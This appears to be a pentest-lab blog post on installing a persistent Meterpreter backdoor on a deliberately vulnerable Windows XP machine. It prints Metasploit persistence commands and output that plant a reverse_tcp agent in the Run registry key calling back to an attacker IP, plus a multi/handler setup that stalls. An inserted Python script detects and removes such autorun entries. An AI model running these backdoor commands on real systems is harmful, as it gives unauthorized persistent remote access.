This follows on from a previous post within which a target machine was exploited and a Meterpreter shell obtained. Details of the exploited machine are:
Windows XP Pro Service Pack 2 (unpatched), with the firewall and software updates switched off, Microsoft Internet Information Services (IIS) web server and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web application running.
The following Meterpreter persistence script ensures access to the exploited system even after a reboot. The script comes with a warning:
One word of warning here before we go any further. The persistent Meterpreter as shown here requires no authentication. This means that anyone that gains access to the port could access your back door! This is not a good thing if you are conducting a penetration test, as this could be a significant risk. In a real world situation, be sure to exercise the utmost caution and be sure to clean up after yourself when the engagement is done.
Here are the persistence script's options:
meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host.
OPTIONS:
-A Automatically start a matching multi/handler to connect to the agent
-L <opt> Location in target host where to write payload to, if none %TEMP% will be used.
-P <opt> Payload to use, default is windows/meterpreter/reverse_tcp.
-S Automatically start the agent on boot as a service (with SYSTEM privileges)
-T <opt> Alternate executable template to use
-U Automatically start the agent when the User logs on
-X Automatically start the agent when the system boots
-h This help menu
-i <opt> The interval in seconds between each connection attempt
-p <opt> The port on the remote host where Metasploit is listening
-r <opt> The IP of the system running Metasploit listening for the connect back
On to the Meterpreter script:
meterpreter > run persistence -X -i 50 -p 443 -r 192.168.1.79
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/LAB_20130625.2221/LAB_20130625.2221.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.79 LPORT=443
[*] Persistent agent script is 611063 bytes long
[+] Persistent Script written to C:\WINDOWS\TEMP\urMouyzhUqndV.vbs
[*] Executing script C:\WINDOWS\TEMP\urMouyzhUqndV.vbs
[+] Agent executed with PID 2520
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\TgZcTlqTJNmSbP
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\TgZcTlqTJNmSbP
meterpreter >
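The run above leaves two artifacts on the target: a value with a random name under HKLM\Software\Microsoft\Windows\CurrentVersion\Run, and the .vbs agent it launches in %TEMP% (the cleanup resource file lives on the attacker side only). The following Python script is an added example, not code from the original post or from Metasploit: it audits a text-format registry export (what `reg export` produces) for autorun entries with exactly those characteristics and emits the cmd.exe commands needed to remove them, which is the "clean up after yourself" step the warning calls for, and also what a defender would run to find the backdoor. The sample export, the value names other than the one reported above, the exact form of the value data (a bare path versus a wscript command line) and the scoring thresholds are constructed assumptions.

```python
"""Audit Windows Run/RunOnce autorun entries for artifacts like the ones the
Meterpreter persistence script installs: a random-looking value name whose data
points at a script file living in a temp directory.

Added example, not part of the original post or of Metasploit. The input is a
constructed, text-format registry export (reg export style) embedded inline so
the script runs offline.
"""
import re
from typing import Dict, List

# Constructed sample export. The TgZcTlqTJNmSbP entry mirrors the name and path
# reported by the persistence run; whether the data is a bare path or a wscript
# command line is an assumption, so one entry of each form is included.
SAMPLE_REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"VMware Tools"="\"C:\\Program Files\\VMware\\VMware Tools\\VMwareTray.exe\""
"TgZcTlqTJNmSbP"="C:\\WINDOWS\\TEMP\\urMouyzhUqndV.vbs"
"Updater"="wscript.exe //B //NoLogo \"C:\\DOCUME~1\\user\\LOCALS~1\\Temp\\svchost.vbs\""

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"!Setup"="C:\\WINDOWS\\system32\\cmd.exe /c del \"C:\\WINDOWS\\TEMP\\install.log\""
'''

# "name"="data" lines; REG_SZ data escapes backslashes and quotes with a backslash.
VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')
RUN_KEY_RE = re.compile(r'\\CurrentVersion\\Run(?:Once)?$', re.IGNORECASE)
SCRIPT_RE = re.compile(r'\.(?:vbs|vbe|js|jse|wsf|ps1|bat|cmd)\b', re.IGNORECASE)
TEMP_RE = re.compile(r'\\te?mp\\', re.IGNORECASE)
PATH_RE = re.compile(r'[A-Za-z]:\\[^"]*?\.(?:vbs|vbe|js|jse|wsf|ps1|bat|cmd)\b', re.IGNORECASE)


def unescape(s: str) -> str:
    """Undo the backslash escaping used for REG_SZ data in .reg files."""
    return re.sub(r'\\(.)', r'\1', s)


def parse_reg_export(text: str) -> Dict[str, Dict[str, str]]:
    """Return {key_path: {value_name: value_data}} for every key in the export."""
    keys: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            keys[current][unescape(m.group(1))] = unescape(m.group(2))
    return keys


def is_random_name(name: str) -> bool:
    """Heuristic (assumption): 10+ letters only, with frequent case switches."""
    if not re.fullmatch(r"[A-Za-z]{10,}", name):
        return False
    switches = sum(1 for a, b in zip(name, name[1:]) if a.isupper() != b.isupper())
    return switches >= 4


def classify(name: str, data: str) -> List[str]:
    """List the reasons an autorun entry looks like a dropped script backdoor."""
    reasons = []
    if SCRIPT_RE.search(data):
        reasons.append("launches a script file")
    if TEMP_RE.search(data):
        reasons.append("runs from a temp directory")
    if is_random_name(name):
        reasons.append("random-looking value name")
    return reasons


def suspicious_autoruns(keys: Dict[str, Dict[str, str]], min_score: int = 2) -> List[dict]:
    """Return Run/RunOnce entries scoring at least min_score (threshold is an assumption)."""
    findings = []
    for key, values in keys.items():
        if not RUN_KEY_RE.search(key):
            continue
        for name, data in values.items():
            reasons = classify(name, data)
            if len(reasons) >= min_score:
                findings.append({"key": key, "name": name, "data": data,
                                 "reasons": reasons, "score": len(reasons)})
    return findings


def cleanup_commands(finding: dict) -> List[str]:
    """cmd.exe commands that remove the autorun value and the script it launches.
    The running agent process must be terminated separately; its PID is not in the export."""
    key = finding["key"].replace("HKEY_LOCAL_MACHINE", "HKLM").replace("HKEY_CURRENT_USER", "HKCU")
    name = finding["name"]
    cmds = [f'reg delete "{key}" /v "{name}" /f']
    m = PATH_RE.search(finding["data"])
    if m:
        cmds.append(f'del /f "{m.group(0)}"')
    return cmds


if __name__ == "__main__":
    for f in suspicious_autoruns(parse_reg_export(SAMPLE_REG_EXPORT)):
        print(f'{f["key"]}\\{f["name"]} -> {f["data"]}')
        print("  reasons:", "; ".join(f["reasons"]))
        for cmd in cleanup_commands(f):
            print("  cleanup:", cmd)
```

The score threshold keeps the "!Setup" RunOnce entry (temp directory only) out of the findings while flagging both dropped scripts; tune `min_score` and the regexes to the environment rather than treating them as a signature, since a random value name and a %TEMP% path are exactly the defaults a tester would change on a real engagement.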
I have rebooted the target machine and will now test the connection from Metasploit.
msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > set LHOST 192.168.1.79
LHOST => 192.168.1.79
msf exploit(handler) > exploit
[-] Handler failed to bind to 192.168.1.79:443
[*] Started reverse handler on 0.0.0.0:443
[*] Starting the payload handler…
And it stuck there.
No idea why this didn’t work.